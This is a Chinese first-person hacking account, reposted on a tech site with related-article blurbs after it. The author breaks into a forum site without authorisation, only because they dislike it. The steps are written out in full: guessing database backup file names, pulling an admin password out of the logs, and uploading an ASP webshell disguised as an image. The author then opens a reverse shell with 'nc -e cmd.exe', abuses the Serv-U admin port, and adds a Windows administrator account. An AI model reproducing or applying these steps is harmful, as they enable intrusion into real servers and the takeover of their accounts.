入侵信息监控系统,获取信息监控系统的权限
今天终于GK完了
无聊闲逛在网上,意识催魂试的找我要文章...
哈~发现一迷信网站,不爽...
(入侵需要理由吗?不需要吗?需要吗?....)用
telnet www.xxx.com 80get enterHTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jun 2005 11:56:00 GMT
Content-Type: text/html
Content-Length: 87
失去了跟主机的连接。F:\Documents and Settings\lu\桌面>看到没,获得很多有用的信息哦先去WEB上看看有没有什么漏洞哈!发现DVBBS7.1 论坛前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看!dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!
没办法,试试!http://www.xxxx.com/bbs/databackup/20050406.mdb
http://www.xxxx.com/bbs/databackup/20050407.mdb
http://www.xxxx.com/bbs/databackup/20050408.mdb
.....
晕..到32了还没出来
管理员不是白痴哦!
http://www.xxxx.com/bbs/databackup/200504.mdb
faint!他不是白痴谁是!
跳出了可爱的下载对话框!downloading.... 完成!用辅臣数据库浏览器打开,选择Dv_Log(2586)
字段名选择l_content 关键字添password2点查询
许多信息出来了哦!
经过筛选
发现一条:
oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更 新哈,想到什么了?登陆啊,不过用户名不知道,是葛飞吗~开玩笑,那简单,其实转化这个我用他本身的页面,
在登陆页面上用户名和密码乱添
点登陆
http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填写登录信息填写登录信息这句话意思是“填写登录信息”那么就把填写登录信息换成叼防!提交!看到了吧!用户名是“叼防”
晕!
什么名字啊!不管了,登陆!
成功!呵呵~把老兵的asp站长助手另存为admin_system321.gif上传!晕!一流信息监控系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:drop table换海阳top的传,在晕...还是被拦截!不行!我就不信上不去!
<%if err="">
<%
end if %>
<%On Error Resume Next
if request("cmdx")="cmd.exe" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
保存成为cmd.gif
上传成功!
登陆后台用数据库管理还原成根目录下的admin_system321.asp_system321.asp">http://www.xxx.com/bbs/admin_system321.asp登陆,啊...CMD窗口那里显示无法找到该页
您正在搜索的页面可能已经删除、更名或暂时不可用。
--------------------------------------------------------------------------------请尝试以下操作:确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
单击后退按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。
Internet 信息服务 (IIS)--------------------------------------------------------------------------------技术信息(为技术支持人员提供)转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。
打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 把我的SYSTEM32下的CMD.exe用记事本打开,另存为111.gif上传!
在用刚才的方法备分成跟目录下的cmd.exe把刚才cmd.gif里cmd.exe改成他的绝对路径全都上传!然后备分!
访问_system321.asp">http://www.xxx.com/bbs/admin_system321.asp
哈!成功!
在用上面的方法把nc传上去!
本地命令提示符执行 nc -vv -l -p 9999
在webshell里执行nc.exe -e cmd.exe 自己IP 9999
NC监听的窗口就出现一个可爱的SHELL在写个文件如下echo USER LocalAdministrator>2.txt
echo PASS #l@$ak#.lk;0@P>>2.txt
echo SITE MAINTENANCE>>2.txt
echo -setdomain>>2.txt
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt
echo -DynDNSEnable=0 >>2.txt
echo DynIPName=>>2.txt
echo -SETUSERSETUP>>2.txt
echo -IP=0.0.0.0>>2.txt
echo -PortNo=22>>2.txt
echo -User=tyrant>>2.txt
echo -Password=19851011>>2.txt
echo -HomeDir=c:\>>2.txt
echo -Maintenance=System>>2.txt
echo -Ratios=None>>2.txt
echo Access=c:\^|RWAMEICDP>>2.txt
echo -GETUSERSETUP>>2.txt"^"符号的作用相信大家都了解吧!我不罗嗦了。把上面批处理保存为1.txt在SHELL中用NC提交nc 127.0.0.1 43958<1.txt回显发现220 Domain settings saved
200-User=test1
200 User settings saved成功了!成功添加了用户tyrant密码19851011登陆对方的ftp
转到system32文件夹下quote site exec "net.exe user tyrant 19851011 /add"quote site exec "net.exe localgroup administrators tyrant /add"quote site exec "net.exe user start telnet"用tyrant管理员telnet上去
传个批处理开3389哈...正在连接到...文章到此结束
什么是密码破解?密码破解的攻击方式有哪些?
密码与用户帐户的有效利用是网络安全性的最大问题之一。在本文中,Rob Shimonski将研究密码破解:如何以及为何进行密码破解。Rob将只说明渗透网络是多么简单,攻击者如何进入网络、他们使用的工具以及抗击它的方
详情2018-01-09 10:59:32责编:llp 来源:驱动管家杀毒软件是怎么被破坏的?破坏杀毒软件的方法
最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今的病毒过于厉害,还是杀毒软件的能力有限?今天我们就通过实例来看看是
详情2018-01-10 10:48:06责编:llp 来源:驱动管家腾讯qq空间的漏洞是什么?怎么修复?
QQ空间存在一处储存型跨站详细说明:QQ空间应用处有一个文件夹应用,该应用可以重命名文件名,正常情况下客户端是过滤了特殊字符的。但是特殊字符仅仅在客户端做了过滤并没有在服务端 和输出端过滤。因此我们可
详情2018-01-28 08:58:22责编:llp 来源:驱动管家什么是网络爬虫?网络爬虫不安全体现在哪些方面?
网络爬虫概述网络爬虫(Web Crawler),又称网络蜘蛛(Web Spider)或网络机器人(Web Robot),是一种按照一定的规则自动抓取万维网资源的程序或者脚本,已被广泛应用于互联网领域。搜索引擎使用网络爬虫抓取Web网
详情2018-01-14 16:58:40责编:llp 来源:驱动管家黑客技术学习 黑客必须了解的词汇
1、webshell这是“黑客”在web网站留下的网页后门程序,一般由一些网页程序编写,来执行一些特殊的功能。如PHP、ASP等。如它可以执行某些命令,如果web网站管理员对服务器权限设置出现漏洞。“黑客”可以通过它,
详情2018-01-23 09:06:49责编:llp 来源:驱动管家swf播放器swfexplorer1.4版的破解实例
【破文标题】SWF探索者1 4的破解【破文作者】云瑞【作者性别】男【作者主页】您的主页【作者邮箱】melove95@163 com【所属组织】第九舰队【软件名称】SWF探索者1 4【下载地址】【破解工具】OLLYDBG1 10,C32ASM,u
详情2018-01-28 12:40:56责编:llp 来源:驱动管家有哪些措施可以防范网络攻击打造网络防火墙?
我们遇到的入侵方式大概包括了以下几种:(1) 被他人盗取密码;(2) 系统被木马攻击;(3) 浏览网页时被恶意的java scrpit程序攻击;(4) QQ被攻击或泄漏信息;(5) 病毒感染;(6) 系统存在漏洞使他人攻击自己
详情2018-01-21 11:48:14责编:llp 来源:驱动管家盛大游戏的fck列出现全盘目路的问题如何解决?
盛大游戏外包管理平台FCK列全盘目路分析与解决方案如下:修改CurrentFolder 参数使用 来进入不同的目录 browser default connectors aspx connector aspx?Command=CreateFolder&Type=Image&CurrentFolder=
详情2018-01-26 13:30:29责编:llp 来源:驱动管家windowsxp系统怎么设置隐藏密码?
随着电脑硬件价格的不断下跌,笔者的“老爷机”通过升级终于又重振雄风,也跑上了双系统(Windows XP和Windows 2000)。由于电脑放在宿舍里,自然也就成了“公共产品”,但在Windows 2000系统中有许多设置确实
详情2018-01-16 13:30:22责编:llp 来源:驱动管家黑客基地的渗透方法(冰兰黑客基地实例)
注:本人已经提交到C R S T ,适合新人学习 首先是有个朋友对我说有个冰兰黑客基地,转载别人的文章还不著名作者,之后还蒙骗别人说他们能入侵国外站点 所以就想检测一下 首先看了以下他的站点,主站和论坛 分
详情2018-01-04 17:49:34责编:llp 来源:驱动管家
- 驱动可不可以手动更新?XP系统怎么手动更新单一驱动程序
- 小米手机助手传送门是什么?小米手机助手怎么用?
- mpg是什么格式的文件?用什么软件可以打开mpg格式文件?
- 不同型号的戴尔dell笔记本电脑介绍
- 东芝m302笔记本的优点是什么?东芝m302笔记本怎么拆机
- 100G已捉襟见肘 400G时代何时到来?
- 局域网传文件有什么快捷的方法?
- 什么办法可以降低笔记本电脑电池损耗程度
- 苹果iphone6发布会直播的地址链接汇总
- 需要隐藏运营商名称?这里有红米3手机隐藏运营商名称的步骤
- 市面上的手机助手软件怎么禁用或者卸载?目前有哪些手机助手?
- 无线局域网是什么?无线局域网怎么清理?
- fastcgi解析漏洞怎么修复?nginx处理fastcgi解析漏洞的方法
- 易班认证失败是什么意思?为什么易班认证校方失败?
- 好豆菜谱手机端有评论功能吗?好豆菜谱怎么给别人评论?
- 戴尔台式机有哪些我们不知道的优缺点呢
- 想要给iphone5s越狱应该怎么操作呢?
- win8电脑的文件管理器导航窗格的内容怎么删减
- 360杀毒快捷键怎么添加到右键的菜单中
- 魅蓝note怎么样?为你全面评测魅蓝note